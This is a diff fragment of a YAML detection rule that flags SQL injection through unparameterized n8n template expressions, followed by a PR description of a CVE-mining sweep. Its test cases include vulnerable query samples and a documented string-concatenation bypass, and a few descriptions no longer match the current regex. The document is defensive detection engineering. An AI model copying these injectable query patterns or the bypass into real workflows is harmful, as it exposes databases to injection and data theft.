+      value: '(?i)\b(?:SELECT|INSERT|UPDATE|DELETE)\b[^\n]{0,40}\b(?:FROM|SET|INTO|WHERE|TABLE)\b(?:(?!\?|:[a-zA-Z_]|\$\d)[\s\S]){0,200}\{\{\s*\$[^}]{0,98}\}\}'
+      description: "SQL verb followed closely by a real SQL clause keyword (FROM/SET/INTO/VALUES/WHERE/TABLE), then a {{ $... }} template expression embedded directly in the query text with no parameterization marker (?, :name, $N) anywhere in between — the n8n executeQuery unparameterized-injection primitive. Requiring the clause keyword close to the verb (not just the bare verb) excludes ordinary English prose using SELECT/INSERT/UPDATE/DELETE as everyday verbs (e.g. 'Update reference to correct name' in unrelated error-fixing documentation, which has no FROM/SET/INTO/VALUES/WHERE/TABLE nearby). Tempered span (not a bare [^;\\n]{0,200}) so a placeholder marker between the clause keyword and the expression correctly rules out the match. The bracket content must start with $ (n8n's actual expression sigil, e.g. $json/$node/$workflow) — a bare '{{ }}' mentioned in documentation prose about expression syntax is not itself an expression."
+
+    - field: content
+      operator: regex
+      value: '(?i)executeQuery[^\n]{0,80}\{\{\s*\$[^}]{0,98}\}\}[^\n]{0,200}\b(?:SELECT|INSERT|UPDATE|DELETE)\b'
+      description: "Workflow-node executeQuery operation with a template expression preceding raw SQL text — n8n-style config co-occurrence"
+
+    - field: content
+      operator: regex
+      value: '(?i)(?:webhook|external\s+trigger)[^\n]{0,120}(?:executeQuery|raw\s+sql)[^\n]{0,120}\{\{\s*\$[^}]{0,98}\}\}'
+      description: "Skill/document content describing a webhook-reachable trigger feeding a template expression into a raw SQL execute operation"
+
+response:
+  actions:
+    - alert
+    - require_human_review
+  message_template: >
+    [ATR-2026-02263] HIGH: SQL injection via unparameterized template-expression
+    value detected (CVE-2026-59257 class). A workflow SQL node interpolates a
+    {{ }}-style expression directly into raw SQL text instead of using a bound
+    parameter. If the workflow is reachable from an external trigger, treat as
+    exploitable — switch to a parameterized query node and rotate the DB
+    credentials the node uses.
+
+confidence: 65
+
+test_cases:
+  true_positives:
+    - input: 'query: "SELECT * FROM users WHERE email = {{$json.email}} AND active=1"'
+      expected: triggered
+      description: "Direct n8n-style unparameterized interpolation into a SELECT statement"
+    - input: 'executeQuery operation config: {{$json.customer_id}} SELECT id, name FROM customers WHERE id = {{$json.customer_id}}'
+      expected: triggered
+      description: "executeQuery co-occurrence with template expression preceding SQL text"
+    - input: >-
+        This workflow has a webhook trigger feeding user input into an executeQuery
+        node, whose raw sql is built as INSERT INTO logs VALUES ({{$json.entry}})
+        with no parameterization.
+      expected: triggered
+      description: "Prose description of the exact webhook-to-executeQuery-to-raw-SQL chain"
+    - input: 'DELETE FROM sessions WHERE token = {{$node["Webhook"].json["token"]}}'
+      expected: triggered
+      description: "DELETE statement with nested n8n expression syntax referencing webhook-sourced data"
+  true_negatives:
+    - input: 'query: "SELECT * FROM users WHERE email = ? AND active=1", params: [{{$json.email}}]'
+      expected: not_triggered
+      description: "Parameterized query — the expression only supplies the bound ? placeholder's value, not concatenated into the SQL text"
+    - input: 'query: "SELECT * FROM users WHERE id = :userId", params: {userId: {{$json.id}}}'
+      expected: not_triggered
+      description: "Named-parameter placeholder (:userId) — safe pattern"
+    - input: 'Send a Slack message: "Order {{$json.order_id}} was placed by {{$json.customer_name}}"'
+      expected: not_triggered
+      description: "Template expression in a non-SQL Slack message body — no SQL keywords present"
+    - input: 'query: "SELECT * FROM products WHERE category = $1", values: [{{$json.category}}]'
+      expected: not_triggered
+      description: "PostgreSQL-style positional placeholder ($1) — safe parameterized pattern"
+    - input: 'This node lets you write custom SQL. Example: SELECT * FROM orders WHERE status = pending -- see docs for {{ }} expression syntax reference'
+      expected: not_triggered
+      description: >-
+        ADVERSARIAL REVIEW (2026-07-13): documentation prose mentioning the bare '{{ }}' syntax while explaining
+        the feature, not an actual expression reference — caught firing in the first draft since '{{ }}' (empty/
+        whitespace-only) satisfied the old [^}]{1,100} bracket-content check. Fixed by requiring the bracket
+        content start with $ (n8n's real expression sigil).
+    - input: >-
+        3. Update reference to correct name
+
+        **Example**: Error { "type": "invalid_reference", "message": "Node 'HTTP Requets' does not exist",
+        "current": "={{$node['HTTP Requets'].json.data}}" }
+      expected: not_triggered
+      description: >-
+        SAFETY-GATE FP (2026-07-13, skills-sh:sickn33/n8n-validation-expert.md): a workflow-linter skill's
+        documentation uses "Update" as an ordinary English verb ("Update reference to correct name") followed
+        by an unrelated JSON error-message example containing a real n8n expression. Fixed by requiring the SQL
+        verb be followed closely (within 40 chars) by an actual SQL clause keyword (FROM/SET/INTO/WHERE/TABLE),
+        which this prose never has.
+
+evasion_tests:
+  - input: 'query: "select * from users where email = {{ $json.email }} and active=1"'
+    expected: triggered
+    bypass_technique: case_and_whitespace_variation
+    notes: "Case-insensitive match plus internal whitespace inside {{ }} handled by the [^}]{1,100} span."
+  - input: 'query: "SELECT * FROM users WHERE email = " + $json.email + " AND active=1"'
+    expected: not_triggered
+    bypass_technique: string_concatenation_instead_of_template_syntax
+    notes: "Plain string concatenation (+ operator) instead of {{ }} expression syntax evades this rule; same vulnerability class expressed without the n8n-specific delimiter. Documented limitation — would need a separate condition for generic string-concat-into-SQL, out of scope for this CVE-specific rule."


### PR DESCRIPTION
## Summary
Weekly /cve-mine sweep. Triaged 13 genuinely new detection_ready candidates since the 2026-07-10 backlog clear (753 total candidates, most already triaged that round). 11/13 filtered out after cross-checking each against the live engine — either server-side-only flaws with no agent-I/O text signal, or already covered by existing generic rules. See `data/cve-collector/promoted.json` for the full per-candidate disposition.

## New rules (2)
- **ATR-2026-02262**: env-resolution credential exfiltration via redirected endpoint (CVE-2026-56259, Crawl4AI). Distinctive payload: a credential field literally set to `env:VARNAME` co-located with a redirected `base_url`.
- **ATR-2026-02263**: SQL injection via unparameterized `{{ }}` template expression in a workflow-automation SQL node (CVE-2026-59257, n8n).

## Adversarial review (mandatory step, not skipped) — 3 real bugs caught before this left the worktree
1. **02262** flagged any non-allowlisted `base_url` as suspicious, including a company's own self-hosted/internal AI gateway using the same `env:` convention — added an internal/private-host exclusion (`.internal`/`.local`/`.lan`, RFC1918, localhost).
2. **02263**'s `{{ }}` bracket-content check accepted an *empty* expression, so documentation prose merely explaining the `{{ }}` syntax (no actual variable reference) matched — now requires the bracket start with `$` (n8n's real expression sigil).
3. **02263**'s bare SQL-verb match collided with "Update" used as an ordinary English verb ("Update reference to correct name") in unrelated workflow-linter documentation — **caught for real by the safety gate's extended-benign corpus** (`skills-sh:sickn33/n8n-validation-expert.md`). Fixed by requiring a genuine SQL clause keyword (FROM/SET/INTO/WHERE/TABLE) close to the verb.

Also found and fixed a "VALUES" clause-keyword loophole: the regex could anchor on a later `values:` section to skip past an earlier placeholder marker (`$1`), defeating the parameterized-query exclusion. Removed VALUES from the clause-keyword list (INTO already covers `INSERT INTO ... VALUES`).

## Test plan
- [x] Full self-test pass on both rules (own true_positives/true_negatives)
- [x] `check-rules-safety.ts --base origin/main`: PASS (65K benign + extended-benign corpus, 0 FP)
- [x] Full suite: 645 passed, 0 failed
- [x] `redos-safety.test.ts`: clean
- [x] Crosswalks regenerated